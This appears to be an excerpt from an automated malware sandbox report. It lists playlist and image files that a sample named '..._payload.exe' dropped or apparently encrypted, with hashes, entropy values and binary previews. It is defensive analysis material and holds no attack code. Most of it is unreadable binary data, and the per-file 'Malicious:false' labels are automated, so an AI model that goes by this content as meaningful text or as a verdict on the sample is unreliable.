                                                                                                      Preview:<?wpl].+y9O?.?...s.8B.D.....=7...'..........}.'dP:-yV.bt.....Xc..':V..J6P....gM&....7..~.i..^1.l;...i.p.Z..n..T...9BS....."..(..q..e.H..>.m......0...Wn..@.\..m.@.......;........sIGL+;. ..Q.v0.6!.Sk...P....\.!^.N...9dr.:.Q.H:n.[...,>.M#...f....6...$..Q..}.......q..$V-/...2$^.V.....s;....x&.h<^@p...sQ..W....c.)G..f9c..fOl{....gC..}....[.....GW...f...j+..A..-.51.W..dSQdu.......J+,.^.HL...k[B,g....:..1.o.&j........'2Co..N..q..........m.b..+K..H...4*..:4..G.....?_..=..#+B.I.'u.ma......G<...1vx.v.../..4..*,.FVz..b.....[!R..n..,.O.!.......p..]....{..|.......3....C..PbE!n.9KR.Vf..dn.it@....QW....T.N....@....d..7.."EA.g....(..,x.1..a..[FeRl..`cH.x.LhD.eA..X.j.".2.._.#.......,[. N)..H.."k.R....6...QI......$..+j.Y...b..K.>.....=[TG.u.r..w.....{.g........Lj...W........d.$....qX..nJ..x..:p.M....}d.yRu.#..}.+MCI.D ....\...L....o..7....$.?.....y...1..,...'..,.c.....J.....C?@4.m_..F .h..6{.y...._.<....o.[....5..L.....%z.,n.+8..*iZ.........m

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\03_Music_rated_at_4_or_5_stars.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1601
                                                                                                      Entropy (8bit):7.869341633562615
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:tJqU/nF15B/p25IZ6scQ0W8SMBnlXMQxjts0HLKrwD:aUPhxZ6scIZMBJPxu0H
                                                                                                      MD5:AFA352819136B6992A50C67681E5389B
                                                                                                      SHA1:FE7714C042297B8CE6EC276E7ABE2A1D4F57F0B6
                                                                                                      SHA-256:5F12E39B3069B1AA8AA9B0C1733CCCFD5F50FBC59C11A1D10CEC2C7655794CFE
                                                                                                      SHA-512:26F5EDC227ADBBEEA7B6B4F5A5B4D7963A80F0907A3967AFE19670362710231A8865D66B488A1668246CB028D19FACB45F47188CE9D1FA8111811E7A44897A7C
                                                                                                      Malicious:false
                                                                                                      Preview:<?wpl..Z..Pv...2..[7....&.xx78.....Y......5.\.....46...gc..0ea..).....m..../...'..#.5.P.P.....c...pvrp^.....,JN'y....5P....F.I0.ZZ.|.Vd..#..I-Ix.@z....3..qT.......P.....%......p....xiFN.N.a...HL.|.bQ.....e..">..%.GV....5.L.*... I.(.."6D.........a.m...PR.W...~v.2.....I5.zBIA.!L.....DX.S.a....[z.-*...A.Y..9.G.....|`^..+.D.Y8.+..=..z1?1.7.....0.J._kOL5.$.]. .A....2?.0.&.x.J./k.!..rWC}...v...z.1."r..d..:........L.W..........dY{.E.....I...%7....f2.vi.0.g$....."..S....b..1.......!6v..I*......x.k$|.....g..:...%w..*....x.A..RJ.%~'c.h.b...y..<....>...-.}q..9.....E...G.l6..I.....1...().....\sM....n..:..A3.LKP*....7...>......,F~.Q"...(....F....R.....,.......... ...}....a.P*.M..O]wqA$........%!.,...{..f}...Z^..:b...~O......k...;\..l.).,q.).$...,....L!1....=...]W.,...A...8.....S.!N.w.\...6.c-..6.....LRQ....}.{g{R..i\.-..q[...JJ.D&m.c... ..\..E..1=0........3.@.6~[.x ..;He.ri..........k.#..k.dT.n.y..>..n.Zl.&....m....b...]]@.%...h.c.3.Ah......n.."....z.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\04_Music_played_in_the_last_month.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1618
                                                                                                      Entropy (8bit):7.874355252123639
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:rno54nZl5yzJM6OV7oUXpZ4i5OP2dlRCRpysvKaohkBVcflbwD:r44n/MVOVNZmPW0pysSa3BVOQ
                                                                                                      MD5:93E24AA7DBFC2C55C2245012C7A71CCE
                                                                                                      SHA1:B1203BCB2A27B7A49E609C6FAFF804E1456B9EF5
                                                                                                      SHA-256:D592B9F85738CAAE3B82F5518DBAE1D9C50A2109B3F3009C19C97BDD36C91CB4
                                                                                                      SHA-512:29C1FB44B14569A8853497B1395F1477037367D9D2B1D67A25419462AC63357410BA488D112AEFAAA06E6758940510489D7E7412E29724A52D4426851124CBBD
                                                                                                      Malicious:false
                                                                                                      Preview:<?wpl..S...G...$.......]o.rb.@x.C..=......{..j.<..'.....J.nN.....T....;..."_.'h0...r...!5.U..r\..1...fR..#fiDp.c..O...<..].f..u.`6.` .....6..S.@.>....,P2.g..b.C..z.7.n.<......l.i......\......y@W.DP.%.2...|fAy.e.n.I.\..r.K...F.N..[.3...lkU..K.2t.........Ba.....FA~.Q.\..]..W.. a...:.q1;.L........S5.@.:...!.d.@...}P3."o..>.....~.Kdd.....Rq.f.U....Cu......J8(...`.8.*. ...|O.Y.+.As...?..Xn(.o..v..]f.F+..3.S.,}..._...(.....1<`|../..O3......h...K..4gdK....V....2..c.'`J.K....K.T.".J.N.`J8..mt@Ethmn.q.....U....oP..Z..O.z&A?K.0.V...td..JL..p<.fg......6.Q!.H..\.E...8VJ.J........J.Bl3..hO.2.....Vz...#}@.= ..3..N..&(..>...B...gr...VG.......m.m&.]....z...&..G.d...j.ZN...N0...b..[...7.@(.Q....K5tV...8`..+.3.3nA.@.`.CO#.. q!.....R3..MS.......L.'...kw.D.......6..A.`/ReTz.9..x.I.0Y@.1.x...N,.P..#....|.].O...p.......".m.#...?g.0...4.e?..x.....H.U|..D....Ej.:...NM@..;|W/._.uW.{.t..'}....5@.BJ.I..@....C...x...l+}P.YdB............p..C6*.tN'._..~

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\05_Pictures_taken_in_the_last_month.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1131
                                                                                                      Entropy (8bit):7.797996018201883
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:exMU75hJBRiF5X8CaGRwDyM8TFafSyI9g+Q2XcLn7o3ZFMUvv6bD:qMU75hJ7eJ8CaIFafStQkX3ZvwD
                                                                                                      MD5:72BE91B47FBD1E21F743ACE12EBC1344
                                                                                                      SHA1:94ABF62AB60DC49D071FA2F3BD10AB7C7180DCCC
                                                                                                      SHA-256:9657F91BBFCA77B6F42D1C9E65BA94832FB8E36D7662E55F0FAFFD352372EC7E
                                                                                                      SHA-512:0633F54898AD4ABEC0DEC358F69C4877DD99CC73BBAE1FC8A435BABD51459DFE24A5F06D37E81FAFF8E3846455E94D66419C78B707AE511EE477B448098BCD07
                                                                                                      Malicious:false
                                                                                                      Preview:<?wplJ.d0..|.!Yg...(:.M..~....*.w..B...Y.x.[.[.<...w.=.....>i0..d^.X;.:^...7.QCpy.3ex.....`T.Fn.<.s.......R.%.....%.H.._.6.~S..'.`./%.P....h...8/.}.h.@.r<....e...d....I.X.,...;...?...U.9.~...PO.&sF.h?.n.....#..R.@.bD.y.g.*.LXG..X......e.f.&.?.g........7......P.!i.\[..o..y"....~x.:...d..1....rhG.=..J..x.. .....!..AFG{...8..+.tF.Al?...f.....#..aXn.....O..TuT?.H...4..*./.....c.`.J..:...s......]p..F.QSv.sf}G<...s.@(......#.~.{$e....W...0..T......0....%...m....~g..}u&!..-H}H...My7@.&.....H......=..M.F.-.D.8r.+.*.w.e.c...iP6....o{..l.bN.M........1.T.n..........4..K..........JA-5...%..U4]..y.....%}{E.'..N..S.\K.D.\.i=...[..x.....r....u.0...x.&..;J...&..d.l....3.R..}.^...|...}......p{.....?.....l..&_..i..Ya...H.....G...]....T.g.c....}v.+....-.>..A.S...g.bZ.....+JV9)C......p.g.....Y.*E..K..J....d.....u.\:....S...<..]MJ).B.Z.......M3.;.l.C..=$..x.1.......3..=.....$.JL&y.n.Cb$.\+$.5=..o......w..|.cz.%.c.Z{.-]...c.hX.IS..X........(...v...=..g..*-.o5...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\06_Pictures_rated_4_or_5_stars.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1119
                                                                                                      Entropy (8bit):7.822090736385246
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:m23nO2mrF6zpKyq7Ddj6HNMDigVBvYID6aot7v6bD:mMO4zpKyohCN4VBvYc6f1wD
                                                                                                      MD5:5801749B4190B1E2C16A6C823AEA0CA0
                                                                                                      SHA1:2F526DBEC319558E77E88D2AA33CB7CF2AAAAF3E
                                                                                                      SHA-256:F9E6AB0CF96CB1536A13D0891C30F185164813E64D1416487A29A96BE782B2C8
                                                                                                      SHA-512:486ADFF9921B2332DE45B0991D1A16B596B82EABB46113858901911DE33217461330238A59AAE23519168FA87CCD55AD14438F348D53EA7408913B05F6CFB2E8
                                                                                                      Malicious:false
                                                                                                      Preview:<?wplH.,4o.f ...\e......=...{..A9....._(..+..w.KJ..C....4...[!.}Vp.c.z.F.@x..}<.X..U.Z..&.H..k7.L..z....&..<....dK...&q.....69y...r..d7^.|.f.........x)...F..|...!..A.@.....-..g....0..(.t..:J.#.-.'........PL..6.<.........9.].#.\...F...../..|.....+...+`.4..Gc..wR.N....R...O2i.4......Lq.Q`_........M..KF2..........2./...4.........m...'.....d.2.,..WG.....%,\=3.R.]..(e....p.>....i....(.....,.......{f...X7...E.G....>.h...&.Q.....0.%.x.3u..y...nE.Q..i~x...}.......r..J.zgSl..d......5..2.=s.....ELE..[..hNx.........v...kA.\.W.*.L]..2.)|{_....lH.@.....-........<oG~......Q.......d..V.'..V.........CL.%.l..}...(.....U.@..7C.F....S.wN....kx8p#....m..\.9...e.?Y..............N......i.,.UM.QB./T....w.z.P...* ].y..8......e.....}.'t..b.....>=..Y..%W LN..o.....S.a.-rS.R...).......O'a.4+..q"...mM..v.#...)d....[.k...?G..'..).\.v.|J...>._J..!U....dX....(.f..'.8*c,.-[..z.....Z.a...].d%r..2.....r..4ud..$Dx..D.!6dm..-...I ..\$.B.)......sO.T..Dp.8..-..8.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\07_TV_recorded_in_the_last_week.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1374
                                                                                                      Entropy (8bit):7.860021877102686
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:9Jo7jOf+vKRGLgOuHeyoxZBQR26uMHIw+gIxWgdaezpQ8f53gGRCr5DXZ3cMv6bD:9Jo7U+vKRNOIeyojEd5owNypHf2FFh5s
                                                                                                      MD5:A49BB30B18CD6B0EFCFC0D62E0AB4E2E
                                                                                                      SHA1:026C561240B2FCD9E2A328C6C8442C09B6A9D07B
                                                                                                      SHA-256:6121EE0D9869736EEBD340BEF472C4F6385260561793265A04B2AC05D3107CBA
                                                                                                      SHA-512:BEC2E40B1E8962019AF131FA2925AEE163346AF12845AB849911F0007033A17922CDFE0939AE1EB045C688880225F7025CBAD99C8D3BF6E75E23F0FA613738FA
                                                                                                      Malicious:false
                                                                                                      Preview:<?wpl.r./Q..1...z}Q...n.........@.Y.lH......z..2q..o....>[.X.Pj-.'.......k.}.......6"..8....Xj.*#)....RV.p.~.w....ty..|....<.4|.y...D......zWVdB/,..Vuu...Mne....X2B.N/..>..n.D..............}..'..._).p.V....{..Ytu.......p...I.D~T...\R..EV%.G&..n....'.>......a...U.?..G+...37.e.,K.w.a..M...0a4o.......b......}.....H..|.G.;....SM/h..}...e....e.LG.>...3.Mo4.....|9M .......ETB.|.*..`..S....s<. ..k.X..Y............bJ$.`.N.stLR..x..6.]..^.l..T..#.X..gp..p._.A.B....H..q...1..4&.`'".h...V..Cs.."'..Gl......g..u...I..Q;.K.Fa.M.WeVPk..-.....V..:.u....t.P...).E.....Q.j>...^...&.......T....m.8PC.lu$7.....p.(...S0q...[..T+....f.>..X.....=~....."f..>....M..A...'.....q#....h..;.{..L...`,..k.....F...]..hk..-..d..D..M.%.!..LbTIp..se.....w...).M!....0<.6cS...|.e.|{........`......0...K.cV..4../a..$aU.c.dI.....o....{..;.....'R.GH..>..Y....;..;...bv..e.........1...d......]@.yq.,.g...~.....BC%m..S..............*5=....H"........U.n.. y...Sf`......w.....cg+..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\08_Video_rated_at_4_or_5_stars.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1354
                                                                                                      Entropy (8bit):7.838803121155285
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:RLbwz4kEwfquYUGbzkUwFFPhD8VaW9ZR1LF1v+w65BxEz+XFLa5f0xZ6lc6qv6bD:RxuUbzkztcDl/65BIuFLaZ06l/qwD
                                                                                                      MD5:8660A0EB4C10B42564E9C24DC3DB8BFD
                                                                                                      SHA1:20753A4AF2FC2DF06224DD17B98601AE4F9EE05B
                                                                                                      SHA-256:86EE422CBE2E1DF129441D71FE23E6658E9E5C6244EFB2705F0185DDB67E34D5
                                                                                                      SHA-512:2673E5D8B69DB01DC3FF8F644A0E2967D73A0DC6D8506B27A62B8EDC46ADA77DA54FA482588C33B3C6CDEDA7CE6C53CA91939D9943AE8469A0D5D834E7A5F4DC
                                                                                                      Malicious:false
                                                                                                      Preview:<?wpl...B.f.....T?...g5.&E.#x..,...^.pU...k...m......:.GN...R...v..ipEm...U.U%.........d......e*....8Z.b..../.\i.y.}KOL..L.1.@/.....C..3@...4..b.X..S..Ui...r..1..z.I.D\a.d.....5....=..6S>.....4...0.2[...(_.x.N....s....x}.c.........X...Ce.G...<5].....r1...c....\...k.b......S...s.;..Y!D.[....{C-.v..P.W.B...9.../Be...r.C.<]..6T.F.Z.M.....gJV.!Lqo...$]c...s..|.N..&{.%#....T.t3...7......w.z...81v{E.|.b...LO.|.6h4c.U...E~.!..ha..V.m..a.`Iv..9.N......l......X8.K..rq.T._....%."..67..y.{`..im..\.=k]..a....\x.......x..<.....S.....C$7"..N...S....WzN...^.T.....~..P7.Gc..@/...S]}..s..\....Z.'...1...O.}.9...I.~....;.{..~..8e.....a.........4.g.....Yum..U.[v.Z.d..#....A~.mS.Gq.'S.4.Z...t.dN...U>.........16Gx....x..C.:.ZH.J..ga.....0.[.x__.s;xx8......n...}P5h...........*.....H.../l..d..87.?....R.+.J7x._..O|.- .7k.....K...?s,X.....~M.r]....:..B.w.M.g...M....^G......=W.H7..v...R...s.d.!...!......;Q(....z....c..o.xHF.MV=7...#......Jd..(h+..J. ..|1."..Z{,#..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\09_Music_played_the_most.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1359
                                                                                                      Entropy (8bit):7.843135420058067
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AKI05UW/T+Rq3hFO1pmH2VLQj05izP/XTPjaBGp2bV6ocTA/pRRi9zHTXZX3v6bD:Ac5UW/4QwJSdvHp2MocTyRROHNwD
                                                                                                      MD5:0DE82E1F9BB8732AFA89E9623B8A662F
                                                                                                      SHA1:9258A9989BCEC3499EB22A85D392333BE7966B30
                                                                                                      SHA-256:81E283348F1C7AEB71A6B8587BFB9794FE74E82C5DA253481EA2FBAEF003E43D
                                                                                                      SHA-512:FA35846B94DF8DEC3752FDC39327681DB706AEBA0D0222C382EB3FB58A0E4EABAE0EB447AD9C4A7EC87CE12F06AF82597EC77FF0BB12345F4F0944F93BCC8609
                                                                                                      Malicious:false
                                                                                                      Preview:<?wpl....."...L.....BAf...n......m..1Wr...7.h0..#...i.E.|g/.8 O.g.QZ..."....h.U..TL.I.>.:~#..3/X@/5.(........>.h..a.3....c....t?..T..XnC'Q.q.y.....@#c.(i..6#.P.X:..z.......3........0.%..jC..Tv..d...4Q[.....<#s.*...qp.q...g...8p..u._l.W.F~......`....y~..#..HyuB..&/].c.hS.[...~....r4.....r50..v...,`..|U&:...\zK.g~..A7.A)...,V...d)$..,..z....s`Tu.X.../.......W...*w...m.>.-.......H%.`T....B.(..rm3..b.....v.mk.n.k+...u.#.&r.%~.%`|E.IdX....7U>..C.?..gExyP$S7....LXM6&..#..[...P..9.y2 jx.a..N.X\.}.6:1...1.U.m...8q.&. .=..}.4.^...G-~S..6...=:..#s..{}...Y.4.M.vh9...7.+.). ?...+.:.FG%.].v.{... .(.n.....F>e`L.R....8\F.g..:.Z.j...,)....t|.XB..].....eBs.m|'2v{.9.[..r.reL#5o....d.a...K.G.].;Y.......J..OV....QkU.n..).+\m....1..a...QsA..*M...|F....}.[:U......2.o.p0.....3.Po.\.<.$7.h..p.'.@.c....$&.i....m.C$..r;..}.L^.......t...z....+.K.-.][.i..q.....Y.R.yEH..Q...}....._x...<o...CSzf<.n....<A..._..6..R....)...>.e...-r0g.T...kD,.w...../W....t.T...2)

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\10_All_Music.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1397
                                                                                                      Entropy (8bit):7.843934585106052
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:P9q4sIuUzEWec0NyWSoX2ykkvLRdjXPrELNd4DU6NWet4nKYqHPrC0AwJe88v6bD:P9T/ucB0NCFmLRdjXPrEL/47NWvKLHPN
                                                                                                      MD5:AB43BFAC261BBF4101A651923317424A
                                                                                                      SHA1:A8CAF4D48A687F7342761AC7434E4255B57D7161
                                                                                                      SHA-256:84303FF950BE62AEAA03B1BE3920BADA88FA3468B7FCB921A9705035EEBBDDDB
                                                                                                      SHA-512:9C85F3521DC6BAF698F744DCC7F9E232A746A8AB35A4216DD38E47D905B1A95B19D6E30EA0A706758083883069B8C784D2575ADC7E2804A6667DD23804328CA9
                                                                                                      Malicious:false
                                                                                                      Preview:<?wpl..c.m.Z1...,kMm.......YP..25..za............7..;.K2...m.........SV..1[.d...,.4..`..nA.i.1.;#(GwA.>.*...3.M.i......of.F...}iD..n*F)(..q...rC}>t.y..F6.. yh..F.``.t..d..@,.4o.._..._F......X...*..OI..I...v...E.h.t..........R.l0..Mu..8$P.48.#.d.......|..;.E.7f'$]......g..=...A\.....6.t..".....[.kc.x.;.)..:...k...6...i.P%K..........s.i.4..h...."}....\mW..c...J..o.+L...R..,.gM@.@.h.W...8..U..3d.>H.....I...,.{WBb.O.....`U.../.'.....s.'*.;5..~)....WE.....I\2$[_8F6...u.V.r....y....c.<.{......h'.HO..r.N.n.y.>..........._SR.b.z..B1..7....h*..`7`_t_n..3%..g:K3...;.E`3...&.....#%....C._....u6....C.V.b.^(....'..ot...../<..k-..*.....:.^...m|..U.....S8.X..nu.!.f..6...\.v....F..U.q6.~........uw}$...C.V}gC%...K..D.-.o..$..J.t}*..4H...g.]C}...` .~..._3l+......72,Y{...".|..t..I..4..D.G|0?z..r8U.j..r.q..H..].".Z..u.....'6.n?*<.%..I.f.Y}...N.(....2l..U.....}..x/..w....'.....,.*...Vj..y...&0...c^........s..&1.87...... N.WC..."I..#{...A.]..,.%...!.....`-....7......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\11_All_Pictures.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):919
                                                                                                      Entropy (8bit):7.733992385532577
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ap9MI/ot7YhCqH7eEng4jzwBQnARN0p3cDzD3RJ+JflSDrxr4v6bD:a7MI/T0g7Zng44mnARNa6zTvSaxr4wD
                                                                                                      MD5:AACFE7E78B9C760EBB49C898C918A4D1
                                                                                                      SHA1:D77EC4849FA8704B45165345D7FF383DBA54A50F
                                                                                                      SHA-256:24C47D2C9EA6A14F625D443E8C427FEF2EC5E95579C3BDF19885A45B75FF565C
                                                                                                      SHA-512:91F2E60DD55A7A4367836E23E9EBD92A828196B09F853C87A1ECC64CE40FD538AE3EE48AE09A91624324920E53026C617C230ED2D5785DD1914B3A58770B5472
                                                                                                      Malicious:false
                                                                                                      Preview:<?wplB....w6>..[~..&.R.N.vT..d..)-..`c.<L....o..(.-.....QSL.z..<.86.m.TT..7....[...._.|..3...OQ.B....zK.@.....U3T..>E..Px9.9^...A.....`..J..$>N...I.........EQKc2...Q."|..SA..........4..U...<..:..)..%g.......;`....F.q...>..'.Y...,..(...@.y.F..0...6..v:./L.oc(P'..*...L.v.../.[.[$..r...Po{:....'......*.X.>..-.`....}C..~...i..!U.D..|. ...P..I.N.r..s_.B9.G. $......%...H*...(...l..^l....0._..vR.t$.r......n}.VA......9..U.e......"Sc...ib.%.,}.%..w(..9x.*..L.rln.Sr....a.b[-.^S.V(.....{.*wAb:.1.2.zi..]!G..*...`6..3...F(.._...........i...G.N...qFc.....w.7+t<}w8...>..........&..I..i.V.Q..'.........yf..Jv...m....[....W..?J.J/d..F..@.r.X..j..w...u7.H...p..t.i"..<../TN$../.R1.;v..^..Lh...A....x...M...~p..;..R..L..g.}. N.Hh.h.i~.E.-n.'L../:..*.t..f...i..rt.b.!9.%+..E...zI|L.;+.JR...@E.($>.J3......F!K.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\12_All_Video.wpl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1413
                                                                                                      Entropy (8bit):7.862864423269736
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ve1SvnKxGRT7JhPc85ZoREQmrx4I6K8RP538xvdb9S6aNZbIP1w5Eadxv6bD:veUrt7n/Zoadrx4xK8DKvPS59LEadxwD
                                                                                                      MD5:7DB25101B021DE1DB0801821D592BC29
                                                                                                      SHA1:A0E0992B1D938185BF28794B0D24432B48773093
                                                                                                      SHA-256:743F3EA8EB128EE9AB8983FF16AD7418B228C4D63CAF50994564B9AA01EF66C6
                                                                                                      SHA-512:8A774A273CE7528692F011EA4B20071AA62CF152C5B50E4A406F0DBB92991F48A74CD65CE24FBDD4761A1259CFEF0005184FFF6913200B589F1917649F76A363
                                                                                                      Malicious:false
                                                                                                      Preview:<?wplv.&3..w...K..t7-S.UH....].P.w.d.(........p...,..X5.U.d..."......v9..O.k.D.7..+.N-.l.W.0...?........e>.<.5M.C.c.f#.3|.3kV.n...i.@"z.Xw.>E8p...S..Jz....4.G....G..2......cT$.......':`.b,_Ar(.u.J.....P.h..B3........z.<..A..W.....TW.e.1...c.~.y...3.5..r.5..jr........(...^..Z..\...H8k..b.n..Z.-...C.9Pl...?j.BQM..m.lLU...3.....m.2Zj.I.+.....K.M./k..[.H.r.2.OS-...zd.q..l.......o..........J...p.V.^.@S@Jz1.v*.....&.....3.>.<^.Z_..mY=..@.jW..A%...?/.a>..."...j..9.L...X....%."+..zO..~c(?....WV7.z.f.23....ge...RcL..#.............j.5............E.&..+.?............y.@7..=.[..@.*...B_.V..."$....E.~..{.<.."...|.|...FD..;...xv....T[s#...B...g.?.........<...Z..m..f7?...~..'@.NZ&VS....-3.N0.K..(.'....u.}..o$N.;..!.t....FB....<1....O.!.m...e>.[}.....2.^D.t.....Yl......c.k..]6...o..&/...iH.1....&.t.Q(%)..6...~<_Y!]gs.I..)......n.%..3..N^..h., |d...G..2.B........y.n..>.-..X.d..p.^[.Qm...V.....D9...b...V`.M:G....n....'.y.s....Ckti.J.vhw..S.7r.....j.W...x.O5....'...@.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{45F61A7D-A745-417E-BD88-2FFDE87A6DA8}mt16400656.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7074
                                                                                                      Entropy (8bit):7.972681695765899
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:48TPXSgYobc9JAWKe0hjfe9CstH0R1hGV:4IfYWkifegk
                                                                                                      MD5:D1FC9142595E7ADC99B3B60D4418CDC7
                                                                                                      SHA1:EB3C8312AF20CB7A2C15D7E3C6F6CE1AA44111C8
                                                                                                      SHA-256:E904AD24008A73A81DB7FC9195C95016C0B25067E448D3E73FCF85744057739F
                                                                                                      SHA-512:60BE758F542FDF877F1A4D0AEB6703E0D76F896EAC1CF4D3CCC75E6B6BF1AE6A9F46695F6CD9A4E07283124D12BDE2C562CD8E0A78ABB5127C41349A3F5B03B9
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG.t\.U%$T..~.}......8e..X..VF<.^4...|..zZh..#".wG9........P.b...fl*^....?.$+..Q`X8...|.On+f(..8.8..4\...6....Q..9.."y.;..a;.6..m..'..b.c+ws..."r.:.$.h.9...V.:.?x.U.&O..Lp}...|zZg\ .>3S.\.XS...0....]...!Nx..*-X[.c]Wxw....T...- ..N."yv..3.....)BqV[j.>:..v..J.B?W.=>.B...A.M5}.Q.4f.W:..`....`..B.DC_.am.9......*..n........D.7m.9a.kH.,.R.....mS...0....*./...v...Kx...9.[t|.$......d_".s....8dqN.^...c.....j.)]...+......4..|...bH.}...E.Y.."..b.h#....e..V-P!:.4\w.m..FaB~..;'..8.T.C$.o)a......2|<7.(..l.q'os......[7c&.a:|&l....Vxq....2.....l.T.{..%Ru....q...s....... MCk..Zs..5....|.?.N.s..i.Q....2.+...V.}.".R.........f.6.<..........v.a7...'.Z.6...6.>.. ...F .y..3./.bh..U?....tl....D@V..c..C..T........a1......=c.....x......0s......6k,4....|...}7../g.|uS.......o.vh..g.[..h...EWG9.5..Fa.s...u5B.]....+...TP.z$.r....9....*Lx.....=^.l..}Bx(.i.R.$}o.a|.F.E'.[.._.......$.b.<.7..D..2.....1.1BC."......P][..iS.7*...(...5..]IJc.......K.,.^$......ZB.!o..+...T.h..rW@......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{7B3AF8A2-A95D-4447-ACC9-7895C91C2D45}mt16400647.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7438
                                                                                                      Entropy (8bit):7.978357809523958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:9LTdbhclGXB6G2GR0Jmyspj6nda0AjN8tS2ldlo6:9LTdbhkEBh9mMzAnA7t2l3N
                                                                                                      MD5:D26EBF0CB5E90183DB630A70862EAEC3
                                                                                                      SHA1:29F8CA4BF2F7B11B42A01A608016C54B6EBE87CE
                                                                                                      SHA-256:633BE6A1E9DF9DEA216C2F095E86FF48F5BE39E5180B64574ACC8E6292D20217
                                                                                                      SHA-512:CFAC89A0D6CB4B2CE0F1E1E60F767CB582099474E2BCD3D4E474432C66893C2069297E7D85A5E4A9925FC73CD79F7E3AE2697FC1504B271BA42E52578BC67FF4
                                                                                                      Malicious:false
